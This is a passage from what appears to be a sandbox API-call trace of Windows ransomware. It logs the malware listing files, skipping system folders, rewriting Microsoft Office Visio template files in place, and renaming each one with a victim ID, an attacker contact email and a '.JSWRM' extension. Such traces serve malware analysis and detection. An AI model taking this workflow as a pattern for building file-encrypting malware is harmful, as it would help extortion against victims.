ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x8352, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BA_GRP_M.VSSX", cAlternateFileName="BA_GRP~2.VSS")) returned 1 [0144.765] lstrcmpiW (lpString1="BA_GRP_M.VSSX", lpString2=".") returned 1 [0144.766] lstrcmpiW (lpString1="BA_GRP_M.VSSX", lpString2="..") returned 1 [0144.766] lstrcmpiW (lpString1="BA_GRP_M.VSSX", lpString2="...") returned 1 [0144.766] lstrcmpiW (lpString1="BA_GRP_M.VSSX", lpString2="windows") returned -1 [0144.766] lstrcmpiW (lpString1="BA_GRP_M.VSSX", lpString2="recovery") returned -1 [0144.766] lstrcmpiW (lpString1="BA_GRP_M.VSSX", lpString2="perflogs") returned -1 [0144.766] lstrcmpiW (lpString1="BA_GRP_M.VSSX", lpString2="documents and settings") returned -1 [0144.766] lstrcmpiW (lpString1="BA_GRP_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0144.766] lstrcmpiW (lpString1="BA_GRP_M.VSSX", lpString2="system volume information") returned -1 [0144.766] lstrcmpiW (lpString1="BA_GRP_M.VSSX", lpString2="msocache") returned -1 [0144.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BA_GRP_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BA_GRP_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BA_GRP_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0144.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BA_GRP_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BA_GRP_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BA_GRP_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0144.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.766] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.766] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BA_GRP_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\ba_grp_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.768] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=33618) returned 1 [0144.768] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.768] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x8350, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x8350, lpOverlapped=0x0) returned 1 [0144.772] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.772] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x8350, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x8350, lpOverlapped=0x0) returned 1 [0144.773] CloseHandle (hObject=0x314) returned 1 [0144.773] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BA_GRP_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\ba_grp_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BA_GRP_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\ba_grp_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.775] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xa326fd, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0xa326fd, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1159842, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x7c37, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BA_GRP_U.VSSX", cAlternateFileName="BA_GRP~1.VSS")) returned 1 [0144.775] lstrcmpiW (lpString1="BA_GRP_U.VSSX", lpString2=".") returned 1 [0144.775] lstrcmpiW (lpString1="BA_GRP_U.VSSX", lpString2="..") returned 1 [0144.775] lstrcmpiW (lpString1="BA_GRP_U.VSSX", lpString2="...") returned 1 [0144.775] lstrcmpiW (lpString1="BA_GRP_U.VSSX", lpString2="windows") returned -1 [0144.775] lstrcmpiW (lpString1="BA_GRP_U.VSSX", lpString2="recovery") returned -1 [0144.775] lstrcmpiW (lpString1="BA_GRP_U.VSSX", lpString2="perflogs") returned -1 [0144.775] lstrcmpiW (lpString1="BA_GRP_U.VSSX", lpString2="documents and settings") returned -1 [0144.775] lstrcmpiW (lpString1="BA_GRP_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0144.775] lstrcmpiW (lpString1="BA_GRP_U.VSSX", lpString2="system volume information") returned -1 [0144.775] lstrcmpiW (lpString1="BA_GRP_U.VSSX", lpString2="msocache") returned -1 [0144.775] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BA_GRP_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.775] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BA_GRP_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BA_GRP_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0144.775] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BA_GRP_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.775] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BA_GRP_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BA_GRP_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0144.775] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.775] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.775] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BA_GRP_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\ba_grp_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.776] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=31799) returned 1 [0144.776] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.776] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x7c30, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x7c30, lpOverlapped=0x0) returned 1 [0144.779] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.779] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x7c30, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x7c30, lpOverlapped=0x0) returned 1 [0144.780] CloseHandle (hObject=0x314) returned 1 [0144.780] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BA_GRP_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\ba_grp_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BA_GRP_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\ba_grp_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.781] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c8663f, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1c8663f, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1c8663f, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x23077, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BCKGRN_M.VSSX", cAlternateFileName="BCKGRN~2.VSS")) returned 1 [0144.781] lstrcmpiW (lpString1="BCKGRN_M.VSSX", lpString2=".") returned 1 [0144.781] lstrcmpiW (lpString1="BCKGRN_M.VSSX", lpString2="..") returned 1 [0144.781] lstrcmpiW (lpString1="BCKGRN_M.VSSX", lpString2="...") returned 1 [0144.781] lstrcmpiW (lpString1="BCKGRN_M.VSSX", lpString2="windows") returned -1 [0144.781] lstrcmpiW (lpString1="BCKGRN_M.VSSX", lpString2="recovery") returned -1 [0144.781] lstrcmpiW (lpString1="BCKGRN_M.VSSX", lpString2="perflogs") returned -1 [0144.781] lstrcmpiW (lpString1="BCKGRN_M.VSSX", lpString2="documents and settings") returned -1 [0144.781] lstrcmpiW (lpString1="BCKGRN_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0144.781] lstrcmpiW (lpString1="BCKGRN_M.VSSX", lpString2="system volume information") returned -1 [0144.781] lstrcmpiW (lpString1="BCKGRN_M.VSSX", lpString2="msocache") returned -1 [0144.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BCKGRN_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BCKGRN_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BCKGRN_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0144.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BCKGRN_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BCKGRN_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BCKGRN_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0144.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.782] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BCKGRN_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bckgrn_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.783] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=143479) returned 1 [0144.783] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.783] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x23070, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x23070, lpOverlapped=0x0) returned 1 [0144.795] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.795] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x23070, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x23070, lpOverlapped=0x0) returned 1 [0144.797] CloseHandle (hObject=0x314) returned 1 [0144.797] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BCKGRN_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bckgrn_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BCKGRN_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bckgrn_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.798] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x198b948, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x198b948, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1abcabc, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x2201f, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BCKGRN_U.VSSX", cAlternateFileName="BCKGRN~1.VSS")) returned 1 [0144.798] lstrcmpiW (lpString1="BCKGRN_U.VSSX", lpString2=".") returned 1 [0144.798] lstrcmpiW (lpString1="BCKGRN_U.VSSX", lpString2="..") returned 1 [0144.798] lstrcmpiW (lpString1="BCKGRN_U.VSSX", lpString2="...") returned 1 [0144.798] lstrcmpiW (lpString1="BCKGRN_U.VSSX", lpString2="windows") returned -1 [0144.798] lstrcmpiW (lpString1="BCKGRN_U.VSSX", lpString2="recovery") returned -1 [0144.798] lstrcmpiW (lpString1="BCKGRN_U.VSSX", lpString2="perflogs") returned -1 [0144.798] lstrcmpiW (lpString1="BCKGRN_U.VSSX", lpString2="documents and settings") returned -1 [0144.798] lstrcmpiW (lpString1="BCKGRN_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0144.798] lstrcmpiW (lpString1="BCKGRN_U.VSSX", lpString2="system volume information") returned -1 [0144.798] lstrcmpiW (lpString1="BCKGRN_U.VSSX", lpString2="msocache") returned -1 [0144.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BCKGRN_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BCKGRN_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BCKGRN_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0144.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BCKGRN_U.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BCKGRN_U.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BCKGRN_U.VSSX", lpUsedDefaultChar=0x0) returned 13 [0144.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.798] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.799] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BCKGRN_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bckgrn_u.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.801] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=139295) returned 1 [0144.801] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.801] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x22010, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x22010, lpOverlapped=0x0) returned 1 [0144.812] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.812] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x22010, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x22010, lpOverlapped=0x0) returned 1 [0144.813] CloseHandle (hObject=0x314) returned 1 [0144.813] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BCKGRN_U.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bckgrn_u.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BCKGRN_U.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bckgrn_u.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.814] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3601957, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x3601957, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x3601957, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x3878f, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BLDCOR_M.VSSX", cAlternateFileName="BLDCOR~3.VSS")) returned 1 [0144.815] lstrcmpiW (lpString1="BLDCOR_M.VSSX", lpString2=".") returned 1 [0144.815] lstrcmpiW (lpString1="BLDCOR_M.VSSX", lpString2="..") returned 1 [0144.815] lstrcmpiW (lpString1="BLDCOR_M.VSSX", lpString2="...") returned 1 [0144.815] lstrcmpiW (lpString1="BLDCOR_M.VSSX", lpString2="windows") returned -1 [0144.815] lstrcmpiW (lpString1="BLDCOR_M.VSSX", lpString2="recovery") returned -1 [0144.815] lstrcmpiW (lpString1="BLDCOR_M.VSSX", lpString2="perflogs") returned -1 [0144.815] lstrcmpiW (lpString1="BLDCOR_M.VSSX", lpString2="documents and settings") returned -1 [0144.815] lstrcmpiW (lpString1="BLDCOR_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0144.815] lstrcmpiW (lpString1="BLDCOR_M.VSSX", lpString2="system volume information") returned -1 [0144.815] lstrcmpiW (lpString1="BLDCOR_M.VSSX", lpString2="msocache") returned -1 [0144.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLDCOR_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLDCOR_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BLDCOR_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0144.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLDCOR_M.VSSX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0144.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BLDCOR_M.VSSX", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BLDCOR_M.VSSX", lpUsedDefaultChar=0x0) returned 13 [0144.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0144.815] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0144.815] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLDCOR_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bldcor_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0144.816] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=231311) returned 1 [0144.817] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.817] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x27100, lpOverlapped=0x0) returned 1 [0144.830] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.830] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x27100, lpOverlapped=0x0) returned 1 [0144.830] CloseHandle (hObject=0x314) returned 1 [0144.830] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLDCOR_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bldcor_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\BLDCOR_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\bldcor_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0144.832] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x358f248, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x358f248, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x358f248, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x366d5, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="BLDCOR_U.VSSX", cAlternateFileName="BLDCOR~2.VSS")) returned 1 [0144.832] lstrcmpiW (lpString1="BLDCOR_U.VSSX", lpString2=".") returned 1 [0144.832] lstrcmpiW (lpString1="BLDCOR_U.VSSX", lpString2="..") returned 1 [0144.832] lstrcmpiW (lpString1="BLDCOR_U.VSSX", lpString2="...") returned 1 [0144.832] lstrcmpiW (lpString1="BLDCOR_U.VSSX", lpString2="windows") returned -1 [0144.832] lstrcmpiW (lpString1="BLDCOR_U.VSSX", lpString2="recovery") returned -1 [0144.832] lstrcmpiW (lpString1="BLDCOR_U.VSSX", lpString2="perflogs") returned -1 [0144.832] lstrcmpiW (lpString1="BLDCOR_U.VSSX", lpString2="documents and settings") returned -1 [0144.832] lstrcmpiW (lpString1="BLDCOR_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0144.832] lstrcmpiW (lpString1="BLDCOR_U.VSSX", lpString2="system volume information") returned -1 [0144.832] 